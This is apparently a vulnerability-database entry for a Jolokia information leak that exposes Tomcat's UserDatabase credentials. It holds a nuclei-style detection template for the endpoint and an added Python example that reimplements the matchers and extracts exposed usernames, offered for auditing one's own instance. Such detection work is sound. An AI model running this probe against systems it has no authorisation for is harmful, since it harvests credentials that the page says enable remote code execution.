jolokia-tomcat-creds-leak: Jolokia <= 1.7.1 Information Leakage

Date: 2025-08-01 | Affected software: Jolokia | PoC: public

Vulnerability description

An unauthenticated Jolokia endpoint exposes the Tomcat UserDatabase MBean, disclosing Tomcat credentials; those credentials can then lead to remote code execution through WAR upload.

PoC code [public]

id: jolokia-tomcat-creds-leak

info:
  name: Jolokia <= 1.7.1 Information Leakage
  author: pathtaga
  severity: critical
  description: Tomcat's credential disclosure leading to Remote Code Execution via WAR upload.
  tags: jolokia,tomcat,exposure,vuln
  reference:
    - https://github.com/laluka/jolokia-exploitation-toolkit/blob/main/exploits/info-leak-tomcat-creds.py
    - https://therealcoiffeur.github.io/c11011

http:
  - method: GET
    path:
      - "{{BaseURL}}/jolokia/read/Users:database=UserDatabase,type=UserDatabase"
      - "{{BaseURL}}/actuator/jolokia/read/Users:database=UserDatabase,type=UserDatabase"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"mbean":"Users:database=UserDatabase,type=UserDatabase"'
          - '"users":'
        condition: and

      - type: word
        part: body
        words:
          - '"users":[]'
        negative: true
# digest: 4a0a00473045022100da943127b7ae9861849075ebe802fa2792285210da3f5203307ec1d43b09b262022074302171532ca33b1007612c1397f49717af9ff40eec6106d9a75b67b4c5e122:922c64590222798bb761d5b6d8e72950
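The template above is a set of string matchers over the Jolokia reply. The following Python is an added example, not part of the page or the nuclei project: it reproduces the matcher logic (status 200, both words present, empty users list excluded) so an operator can run it against a reply captured from their own instance and confirm the MBean is no longer reachable. The two request paths and the MBean name are taken from the template; the reply bodies are constructed samples, and the assumption that the users attribute is a list of JMX ObjectName strings with a username key is mine, not stated on the page.

```python
import json
import re

# Request paths used by the template (copied from the page); the caller supplies the base URL.
JOLOKIA_PATHS = (
    "/jolokia/read/Users:database=UserDatabase,type=UserDatabase",
    "/actuator/jolokia/read/Users:database=UserDatabase,type=UserDatabase",
)
EXPECTED_MBEAN = "Users:database=UserDatabase,type=UserDatabase"


def build_check_urls(base_url):
    """Return the two URLs the template requests, in template order."""
    base = base_url.rstrip("/")
    return [base + p for p in JOLOKIA_PATHS]


def matches_template(status, body):
    """Replicate the template's matchers (matchers-condition: and):
    - HTTP status must be 200
    - body must contain both the echoed mbean name and a '"users":' key
    - body must NOT contain an empty '"users":[]' list (negative matcher)
    """
    if status != 200:
        return False
    if '"mbean":"%s"' % EXPECTED_MBEAN not in body or '"users":' not in body:
        return False
    if '"users":[]' in body:
        return False
    return True


def exposed_usernames(body):
    """Parse the Jolokia JSON reply and return the user names it exposes.
    Assumption (not on the page): the UserDatabase MBean reports its 'users'
    attribute as JMX ObjectName strings carrying a username=... key, which the
    constructed sample below imitates. Only names are surfaced, nothing else."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    value = data.get("value")
    users = value.get("users") if isinstance(value, dict) else None
    if not isinstance(users, list):
        return []
    names = []
    for entry in users:
        if isinstance(entry, str):
            m = re.search(r'username="?([^",]+)"?', entry)
            if m:
                names.append(m.group(1))
    return names


def audit_response(status, body):
    """Verdict for an operator checking a reply from their own instance."""
    exposed = matches_template(status, body)
    return {"exposed": exposed, "usernames": exposed_usernames(body) if exposed else []}


# Constructed sample replies (not captured from a real system). Jolokia emits
# compact JSON, which json.dumps with these separators reproduces.
def _jolokia_reply(users):
    return json.dumps({
        "request": {"mbean": EXPECTED_MBEAN, "type": "read"},
        "value": {"users": users, "readonly": False},
        "timestamp": 0,
        "status": 200,
    }, separators=(",", ":"))


SAMPLE_EXPOSED_BODY = _jolokia_reply([
    'Users:type=User,username="tomcat",database=UserDatabase',
    'Users:type=User,username="admin",database=UserDatabase',
])
SAMPLE_EMPTY_BODY = _jolokia_reply([])

if __name__ == "__main__":
    print(build_check_urls("https://tomcat.example"))
    print(audit_response(200, SAMPLE_EXPOSED_BODY))  # exposed: True
    print(audit_response(200, SAMPLE_EMPTY_BODY))    # exposed: False (negative matcher)
```

A reply that returns 200 with an empty users list is deliberately treated as not matching, mirroring the template's negative matcher; a 401/403 or a non-JSON error page also fails the check, which is the state a hardened deployment (Jolokia behind authentication or with the UserDatabase MBean unreachable) should show.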
